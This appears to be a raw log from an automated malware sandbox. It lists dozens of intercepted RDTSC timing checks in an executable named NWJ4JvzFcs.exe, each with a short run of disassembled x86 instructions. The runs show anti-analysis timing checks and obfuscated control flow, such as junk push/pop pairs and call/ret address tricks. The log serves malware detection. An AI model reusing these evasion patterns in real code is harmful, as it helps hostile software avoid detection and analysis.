Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147D1BA second address: 147D1D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147DCA4 second address: 147DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147DCA9 second address: 147DCAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147EE2A second address: 147EE9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04A523AA91h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e sub dword ptr [ebp+124600F8h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F04A523AA88h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov esi, ebx 0x00000032 call 00007F04A523AA8Dh 0x00000037 mov esi, dword ptr [ebp+122D1A2Eh] 0x0000003d pop esi 0x0000003e push 00000000h 0x00000040 sbb edi, 01934B66h 0x00000046 sub edi, 2BE305E2h 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push edx 0x00000051 pop edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147EE9A second address: 147EEB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480306 second address: 1480380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F04A523AA88h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov si, 9783h 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f jnc 00007F04A523AA89h 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 push ebx 0x00000038 jng 00007F04A523AA9Eh 0x0000003e jmp 00007F04A523AA98h 0x00000043 pop ebx 0x00000044 push eax 0x00000045 js 00007F04A523AA92h 0x0000004b jl 00007F04A523AA8Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E27 second address: 1480E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E2C second address: 1480E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F04A523AA86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E36 second address: 1480E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jbe 00007F04A523FCB8h 0x00000011 push ecx 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 mov esi, dword ptr [ebp+122D37A3h] 0x0000001b push 00000000h 0x0000001d jc 00007F04A523FCBBh 0x00000023 xor di, 0747h 0x00000028 mov edi, 185B5255h 0x0000002d push eax 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E69 second address: 1480E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480BF2 second address: 1480BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14860EE second address: 14860F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1486F42 second address: 1486F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1486F49 second address: 1486F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1488008 second address: 148807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F04A523FCBDh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D19C7h], ebx 0x00000014 mov edi, dword ptr [ebp+122D3823h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F04A523FCB8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 add bh, FFFFFF83h 0x00000039 jp 00007F04A523FCC8h 0x0000003f call 00007F04A523FCBBh 0x00000044 sub dword ptr [ebp+122D2A0Eh], esi 0x0000004a pop ebx 0x0000004b clc 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F04A523FCC0h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148807B second address: 1488085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F04A523AA86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1489046 second address: 14890D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F04A523FCB8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D3A7Bh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F04A523FCB8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007F04A523FCB8h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 mov dword ptr [ebp+122D28F9h], esi 0x0000006a push eax 0x0000006b push esi 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14850BB second address: 14850C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148B10B second address: 148B10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14871BD second address: 14871C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148B10F second address: 148B113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14881D0 second address: 1488284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007F04A523AA9Eh 0x0000000d nop 0x0000000e xor edi, 37221948h 0x00000014 mov di, dx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+122D3AB3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov bx, 9154h 0x0000002f mov eax, dword ptr [ebp+122D16A9h] 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F04A523AA88h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dword ptr [ebp+12482697h], edx 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ecx 0x0000005a call 00007F04A523AA88h 0x0000005f pop ecx 0x00000060 mov dword ptr [esp+04h], ecx 0x00000064 add dword ptr [esp+04h], 0000001Ah 0x0000006c inc ecx 0x0000006d push ecx 0x0000006e ret 0x0000006f pop ecx 0x00000070 ret 0x00000071 push ebx 0x00000072 push edx 0x00000073 and bx, 9C34h 0x00000078 pop edi 0x00000079 pop ebx 0x0000007a nop 0x0000007b jbe 00007F04A523AA98h 0x00000081 push eax 0x00000082 push edx 0x00000083 jns 00007F04A523AA86h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1489245 second address: 148924A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A280 second address: 148A291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F04A523AA9Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1488284 second address: 1488299 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F04A523FCB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148924A second address: 148924F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A291 second address: 148A295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A295 second address: 148A31E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jno 00007F04A523AA94h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+12459F5Fh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F04A523AA88h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e xor ebx, dword ptr [ebp+122D29DAh] 0x00000044 mov eax, dword ptr [ebp+122D0345h] 0x0000004a mov ebx, dword ptr [ebp+12461549h] 0x00000050 push FFFFFFFFh 0x00000052 mov bl, FDh 0x00000054 nop 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F04A523AA99h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148DD38 second address: 148DDA7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D19C7h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F04A523FCB8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D381Fh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F04A523FCB8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 adc edi, 68F16DADh 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A31E second address: 148A33C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523AA90h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148FCA6 second address: 148FCAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14911B8 second address: 14911BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14911BC second address: 14911C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14911C2 second address: 1491242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F04A523AA9Ch 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F04A523AA88h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b js 00007F04A523AA89h 0x00000031 xor bl, 00000064h 0x00000034 push 00000000h 0x00000036 jmp 00007F04A523AA99h 0x0000003b push 00000000h 0x0000003d or dword ptr [ebp+122D1B83h], ecx 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push eax 0x00000047 pop eax 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1493201 second address: 1493207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B27B second address: 147B2B5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04A523FCCBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F04A523FCC4h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147B3C4 second address: 147B3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F04A523AA8Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CFA68 second address: 14CFA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CFBDD second address: 14CFBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14CFBE1 second address: 14CFBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F04A523FCB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F04A523FCB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D57 second address: 14D3D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D5B second address: 14D3D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F04A523FCBBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D6E second address: 14D3D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3D73 second address: 14D3D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F04A523FCBEh 0x00000010 jbe 00007F04A523FCB6h 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D32AA second address: 14D32AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D32AF second address: 14D32C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3717 second address: 14D3723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F04A523AA86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D3723 second address: 14D376F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F04A523FCC6h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F04A523FCC6h 0x00000014 popad 0x00000015 jc 00007F04A523FCB8h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e pushad 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop ebx 0x00000025 push ebx 0x00000026 push esi 0x00000027 pop esi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D8F21 second address: 14D8F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D8F2A second address: 14D8F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D8F30 second address: 14D8F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edi 0x0000000a jng 00007F04A523AA86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D906F second address: 14D9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9087 second address: 14D908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9680 second address: 14D9684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9684 second address: 14D9688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14D9688 second address: 14D969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA145 second address: 14DA149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA149 second address: 14DA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA151 second address: 14DA161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F04A523AA86h 0x0000000a jbe 00007F04A523AA86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA161 second address: 14DA171 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F04A523FCB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA47E second address: 14DA499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA90h 0x00000009 jl 00007F04A523AA86h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA7A2 second address: 14DA7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DE66E second address: 14DE674 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DE7EB second address: 14DE7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DEE8A second address: 14DEE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DEFFA second address: 14DEFFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DF145 second address: 14DF178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 jmp 00007F04A523AA96h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DF178 second address: 14DF17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EB91D second address: 14EB93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA8Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F04A523AA86h 0x00000012 jns 00007F04A523AA86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EB93F second address: 14EB943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EBD54 second address: 14EBD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F04A523AAA1h 0x0000000b jmp 00007F04A523AA99h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F04A523AA8Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EBD8C second address: 14EBDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCC9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F04A523FCB6h 0x00000012 rdtsc
